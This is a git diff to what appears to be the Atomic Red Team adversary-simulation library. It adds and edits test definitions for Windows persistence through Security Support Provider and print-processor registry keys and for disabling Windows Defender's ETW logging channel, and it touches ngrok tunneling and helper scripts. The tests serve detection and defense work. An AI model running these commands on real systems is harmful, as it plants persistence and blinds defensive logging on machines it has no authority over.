+Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+```
+
+#### Cleanup Commands:
+```powershell
+$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
+```
+
+
+
+
diff --git a/atomics/T1547.005/T1547.005.yaml b/atomics/T1547.005/T1547.005.yaml
index 00c0ac3a..21a9d4e8 100644
--- a/atomics/T1547.005/T1547.005.yaml
+++ b/atomics/T1547.005/T1547.005.yaml
@@ -1,25 +1,42 @@
attack_technique: T1547.005
display_name: 'Boot or Logon Autostart Execution: Security Support Provider'
atomic_tests:
-- name: Modify SSP configuration in registry
+- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry
auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+ description: |
+ Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+ A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+
+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+ name: powershell
+ elevation_required: true
+
+- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry
+ auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
description: Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
supported_platforms:
- windows
- input_arguments:
- fake_ssp_dll:
- description: Value added to registry key. Normally refers to a DLL name in C:\Windows\System32.
- type: string
- default: not-a-ssp
executor:
command: |
- # run these in sequence
- $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
- $SecurityPackagesUpdated = $SecurityPackages
- $SecurityPackagesUpdated += "#{fake_ssp_dll}"
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
- # revert (before reboot)
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+
+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
name: powershell
- elevation_required: true
+ elevation_required: true
\ No newline at end of file
diff --git a/atomics/T1547.012/T1547.012.md b/atomics/T1547.012/T1547.012.md
new file mode 100644
index 00000000..34e6a6cc
--- /dev/null
+++ b/atomics/T1547.012/T1547.012.md
@@ -0,0 +1,64 @@
+# T1547.012 - Boot or Logon Autostart Execution: Print Processors
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/012)
+Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.
+
+Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.
+
+## Atomic Tests
+
+- [Atomic Test #1 - Print Processors](#atomic-test-1---print-processors)
+
+
+
+
+## Atomic Test #1 - Print Processors
+Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+Note: The test assumes a x64 Windows operating system.
+
+The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| restart | set to 1 if you want the computer to reboot as part of the test | integer | 0|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+net stop spooler
+Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+net start spooler
+if(#{restart}){
+ Restart-Computer
+}
+```
+
+#### Cleanup Commands:
+```powershell
+net stop spooler
+rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+net start spooler
+```
+
+
+
+
+
+
diff --git a/atomics/T1547.012/T1547.012.yaml b/atomics/T1547.012/T1547.012.yaml
index 7a8fa7ea..3fe5ed92 100644
--- a/atomics/T1547.012/T1547.012.yaml
+++ b/atomics/T1547.012/T1547.012.yaml
@@ -2,6 +2,7 @@ attack_technique: T1547.012
display_name: 'Boot or Logon Autostart Execution: Print Processors'
atomic_tests:
- name: Print Processors
+ auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
description: |
Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md
index 9f8f9f87..79b67584 100644
--- a/atomics/T1560.001/T1560.001.md
+++ b/atomics/T1560.001/T1560.001.md
@@ -199,7 +199,7 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "PathToAtomicsFolder\..\ExternalP
## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip
-Note: Requires 7zip installation
+Note: This test requires 7zip installation
**Supported Platforms:** Windows
diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml
index 72ea3c29..3d3dc1ef 100644
--- a/atomics/T1560.001/T1560.001.yaml
+++ b/atomics/T1560.001/T1560.001.yaml
@@ -125,7 +125,7 @@ atomic_tests:
- name: Compress Data and lock with password for Exfiltration with 7zip
auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
description: |
- Note: Requires 7zip installation
+ Note: This test requires 7zip installation
supported_platforms:
- windows
input_arguments:
@@ -315,3 +315,5 @@ atomic_tests:
cleanup_command: 'rm -rf #{input_folder}'
name: bash
elevation_required: false
+
+
\ No newline at end of file
diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md
index ba7b792a..5a4d4722 100644
--- a/atomics/T1562.006/T1562.006.md
+++ b/atomics/T1562.006/T1562.006.md
@@ -253,6 +253,7 @@ REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
## Atomic Test #6 - LockBit Black - Disable the ETW Provider of Windows Defender -cmd
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
@@ -268,12 +269,12 @@ so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational any
```cmd
-reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /t REG_DWORD /d 0 /f
+reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
-reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /f >nul 2>&1
+reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
```
@@ -286,6 +287,7 @@ reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Micro
## Atomic Test #7 - LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
@@ -301,12 +303,12 @@ so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational any
```powershell
-New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -PropertyType DWord -Value 0 -Force
+New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
```
#### Cleanup Commands:
```powershell
-Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
```
diff --git a/atomics/T1572/T1572.md b/atomics/T1572/T1572.md
index 20efac16..4bd7f96f 100644
--- a/atomics/T1572/T1572.md
+++ b/atomics/T1572/T1572.md
@@ -166,7 +166,7 @@ Download and run ngrok. Create tunnel to chosen port.
```powershell
C:\Users\Public\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null
-Start-ThreadJob -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp #{port_num} } | Out-Null
+Start-Job -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp #{port_num} } | Out-Null
Start-Sleep -s 5
Stop-Job -Name Job1 | Out-Null
```
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index a672b989..2906c755 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -1370,3 +1370,9 @@ bd85e3d1-4aeb-4a1d-850f-7be3cb8d60b9
4cdc9fc7-53fb-4894-9f0c-64836943ea60
d8d13303-159e-4f33-89f4-9f07812d016f
183235ca-8e6c-422c-88c2-3aa28c4825d9
+05df2a79-dba6-4088-a804-9ca0802ca8e4
+17d046be-fdd0-4cbb-b5c7-55c85d9d0714
+37950714-e923-4f92-8c7c-51e4b6fffbf6
+da558b07-69ae-41b9-b9d4-4d98154a7049
+de3f8e74-3351-4fdb-a442-265dbf231738
+f7d38f47-c61b-47cc-a59d-fc0368f47ed0
diff --git a/bin/generate_counter.py b/bin/generate_counter.py
index 3cd2afe1..bd27d671 100755
--- a/bin/generate_counter.py
+++ b/bin/generate_counter.py
@@ -30,6 +30,7 @@ url = 'https://img.shields.io/badge/{}-{}-{}.svg'.format(
urllib.parse.quote_plus(params['style'])
)
-# Print the shields.io badge URL
-print(url)
+# Save shields URL in Github Output to be used in the next step.
+with open(os.environ['GITHUB_OUTPUT'], 'a') as fh:
+ print(f'result={url}', file=fh)
diff --git a/bin/generate_labels.py b/bin/generate_labels.py
index 72b2cc3f..8545ac8b 100644
--- a/bin/generate_labels.py
+++ b/bin/generate_labels.py
@@ -108,9 +108,18 @@ class GithubAPI:
count = -1
elif line.startswith("+"): # only take count of added lines
changed_lines.append(start + count)
+ elif line.startswith("-"):
+ count -= 1
count += 1
- for index, t in enumerate(data["atomic_tests"]):
- if t["__line__"] in changed_lines:
+ atomics = data["atomic_tests"]
+ for index, t in enumerate(atomics):
+ curr_atomic_start = atomics[index]["__line__"]
+ if index+1 curr_atomic_start and i < curr_atomic_end]
+ if len(changes_in_current_atomic) > 0:
tests.append(ChangedAtomic(technique=technique, test_number=index + 1,
data=t))
diff --git a/bin/validate/atomic-red-team.schema.yaml b/bin/validate/atomic-red-team.schema.yaml
index 13f4fff1..9f03c2bb 100644
--- a/bin/validate/atomic-red-team.schema.yaml
+++ b/bin/validate/atomic-red-team.schema.yaml
@@ -78,6 +78,8 @@ $defs:
enum:
- integer
- float
+ - Integer
+ - Float
default:
type:
- number
@@ -91,6 +93,9 @@ $defs:
- path
- url
- string
+ - Path
+ - Url
+ - String
default:
type:
- string
diff --git a/poetry.lock b/poetry.lock
index 2cdbc565..9071174e 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -20,97 +20,97 @@ tests-no-zope = ["cloudpickle", "hypothesis", "mypy (>=1.1.1)", "pympler", "pyte
[[package]]
name = "certifi"
-version = "2023.5.7"
+version = "2023.7.22"
description = "Python package for providing Mozilla's CA Bundle."
optional = false
python-versions = ">=3.6"
files = [
- {file = "certifi-2023.5.7-py3-none-any.whl", hash = "sha256:c6c2e98f5c7869efca1f8916fed228dd91539f9f1b444c314c06eef02980c716"},
- {file = "certifi-2023.5.7.tar.gz", hash = "sha256:0f0d56dc5a6ad56fd4ba36484d6cc34451e1c6548c61daad8c320169f91eddc7"},
+ {file = "certifi-2023.7.22-py3-none-any.whl", hash = "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9"},
+ {file = "certifi-2023.7.22.tar.gz", hash = "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082"},
]
[[package]]
name = "charset-normalizer"
-version = "3.1.0"
+version = "3.2.0"
description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet."
optional = false
python-versions = ">=3.7.0"
files = [
- {file = "charset-normalizer-3.1.0.tar.gz", hash = "sha256:34e0a2f9c370eb95597aae63bf85eb5e96826d81e3dcf88b8886012906f509b5"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e0ac8959c929593fee38da1c2b64ee9778733cdf03c482c9ff1d508b6b593b2b"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d7fc3fca01da18fbabe4625d64bb612b533533ed10045a2ac3dd194bfa656b60"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:04eefcee095f58eaabe6dc3cc2262f3bcd776d2c67005880894f447b3f2cb9c1"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:20064ead0717cf9a73a6d1e779b23d149b53daf971169289ed2ed43a71e8d3b0"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1435ae15108b1cb6fffbcea2af3d468683b7afed0169ad718451f8db5d1aff6f"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c84132a54c750fda57729d1e2599bb598f5fa0344085dbde5003ba429a4798c0"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:75f2568b4189dda1c567339b48cba4ac7384accb9c2a7ed655cd86b04055c795"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:11d3bcb7be35e7b1bba2c23beedac81ee893ac9871d0ba79effc7fc01167db6c"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:891cf9b48776b5c61c700b55a598621fdb7b1e301a550365571e9624f270c203"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:5f008525e02908b20e04707a4f704cd286d94718f48bb33edddc7d7b584dddc1"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:b06f0d3bf045158d2fb8837c5785fe9ff9b8c93358be64461a1089f5da983137"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:49919f8400b5e49e961f320c735388ee686a62327e773fa5b3ce6721f7e785ce"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:22908891a380d50738e1f978667536f6c6b526a2064156203d418f4856d6e86a"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-win32.whl", hash = "sha256:12d1a39aa6b8c6f6248bb54550efcc1c38ce0d8096a146638fd4738e42284448"},
- {file = "charset_normalizer-3.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:65ed923f84a6844de5fd29726b888e58c62820e0769b76565480e1fdc3d062f8"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:9a3267620866c9d17b959a84dd0bd2d45719b817245e49371ead79ed4f710d19"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6734e606355834f13445b6adc38b53c0fd45f1a56a9ba06c2058f86893ae8017"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f8303414c7b03f794347ad062c0516cee0e15f7a612abd0ce1e25caf6ceb47df"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:aaf53a6cebad0eae578f062c7d462155eada9c172bd8c4d250b8c1d8eb7f916a"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3dc5b6a8ecfdc5748a7e429782598e4f17ef378e3e272eeb1340ea57c9109f41"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e1b25e3ad6c909f398df8921780d6a3d120d8c09466720226fc621605b6f92b1"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ca564606d2caafb0abe6d1b5311c2649e8071eb241b2d64e75a0d0065107e62"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b82fab78e0b1329e183a65260581de4375f619167478dddab510c6c6fb04d9b6"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:bd7163182133c0c7701b25e604cf1611c0d87712e56e88e7ee5d72deab3e76b5"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:11d117e6c63e8f495412d37e7dc2e2fff09c34b2d09dbe2bee3c6229577818be"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:cf6511efa4801b9b38dc5546d7547d5b5c6ef4b081c60b23e4d941d0eba9cbeb"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:abc1185d79f47c0a7aaf7e2412a0eb2c03b724581139193d2d82b3ad8cbb00ac"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:cb7b2ab0188829593b9de646545175547a70d9a6e2b63bf2cd87a0a391599324"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-win32.whl", hash = "sha256:c36bcbc0d5174a80d6cccf43a0ecaca44e81d25be4b7f90f0ed7bcfbb5a00909"},
- {file = "charset_normalizer-3.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:cca4def576f47a09a943666b8f829606bcb17e2bc2d5911a46c8f8da45f56755"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0c95f12b74681e9ae127728f7e5409cbbef9cd914d5896ef238cc779b8152373"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fca62a8301b605b954ad2e9c3666f9d97f63872aa4efcae5492baca2056b74ab"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ac0aa6cd53ab9a31d397f8303f92c42f534693528fafbdb997c82bae6e477ad9"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c3af8e0f07399d3176b179f2e2634c3ce9c1301379a6b8c9c9aeecd481da494f"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a5fc78f9e3f501a1614a98f7c54d3969f3ad9bba8ba3d9b438c3bc5d047dd28"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:628c985afb2c7d27a4800bfb609e03985aaecb42f955049957814e0491d4006d"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:74db0052d985cf37fa111828d0dd230776ac99c740e1a758ad99094be4f1803d"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:1e8fcdd8f672a1c4fc8d0bd3a2b576b152d2a349782d1eb0f6b8e52e9954731d"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:04afa6387e2b282cf78ff3dbce20f0cc071c12dc8f685bd40960cc68644cfea6"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:dd5653e67b149503c68c4018bf07e42eeed6b4e956b24c00ccdf93ac79cdff84"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d2686f91611f9e17f4548dbf050e75b079bbc2a82be565832bc8ea9047b61c8c"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-win32.whl", hash = "sha256:4155b51ae05ed47199dc5b2a4e62abccb274cee6b01da5b895099b61b1982974"},
- {file = "charset_normalizer-3.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:322102cdf1ab682ecc7d9b1c5eed4ec59657a65e1c146a0da342b78f4112db23"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:e633940f28c1e913615fd624fcdd72fdba807bf53ea6925d6a588e84e1151531"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3a06f32c9634a8705f4ca9946d667609f52cf130d5548881401f1eb2c39b1e2c"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:7381c66e0561c5757ffe616af869b916c8b4e42b367ab29fedc98481d1e74e14"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3573d376454d956553c356df45bb824262c397c6e26ce43e8203c4c540ee0acb"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e89df2958e5159b811af9ff0f92614dabf4ff617c03a4c1c6ff53bf1c399e0e1"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:78cacd03e79d009d95635e7d6ff12c21eb89b894c354bd2b2ed0b4763373693b"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:de5695a6f1d8340b12a5d6d4484290ee74d61e467c39ff03b39e30df62cf83a0"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1c60b9c202d00052183c9be85e5eaf18a4ada0a47d188a83c8f5c5b23252f649"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:f645caaf0008bacf349875a974220f1f1da349c5dbe7c4ec93048cdc785a3326"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:ea9f9c6034ea2d93d9147818f17c2a0860d41b71c38b9ce4d55f21b6f9165a11"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:80d1543d58bd3d6c271b66abf454d437a438dff01c3e62fdbcd68f2a11310d4b"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:73dc03a6a7e30b7edc5b01b601e53e7fc924b04e1835e8e407c12c037e81adbd"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:6f5c2e7bc8a4bf7c426599765b1bd33217ec84023033672c1e9a8b35eaeaaaf8"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-win32.whl", hash = "sha256:12a2b561af122e3d94cdb97fe6fb2bb2b82cef0cdca131646fdb940a1eda04f0"},
- {file = "charset_normalizer-3.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:3160a0fd9754aab7d47f95a6b63ab355388d890163eb03b2d2b87ab0a30cfa59"},
- {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:38e812a197bf8e71a59fe55b757a84c1f946d0ac114acafaafaf21667a7e169e"},
- {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6baf0baf0d5d265fa7944feb9f7451cc316bfe30e8df1a61b1bb08577c554f31"},
- {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:8f25e17ab3039b05f762b0a55ae0b3632b2e073d9c8fc88e89aca31a6198e88f"},
- {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3747443b6a904001473370d7810aa19c3a180ccd52a7157aacc264a5ac79265e"},
- {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b116502087ce8a6b7a5f1814568ccbd0e9f6cfd99948aa59b0e241dc57cf739f"},
- {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d16fd5252f883eb074ca55cb622bc0bee49b979ae4e8639fff6ca3ff44f9f854"},
- {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:21fa558996782fc226b529fdd2ed7866c2c6ec91cee82735c98a197fae39f706"},
